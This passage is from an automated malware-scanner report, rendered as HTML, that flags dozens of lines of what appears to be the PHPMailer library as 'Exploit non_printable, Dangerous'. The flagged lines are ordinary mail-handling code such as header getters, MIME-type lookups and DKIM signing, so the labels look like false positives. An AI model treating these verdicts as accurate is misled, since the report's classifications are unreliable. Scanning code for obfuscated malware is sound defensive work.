</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3647</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3658</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3661</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3663</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3680</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3753</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3795</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3898</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3900</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3918</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3928</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3929</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3932</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3953</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3959</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3962</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3964</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3970</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3982</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4001</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4016</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4041</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4052</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4062</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4232</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4243</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4263</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
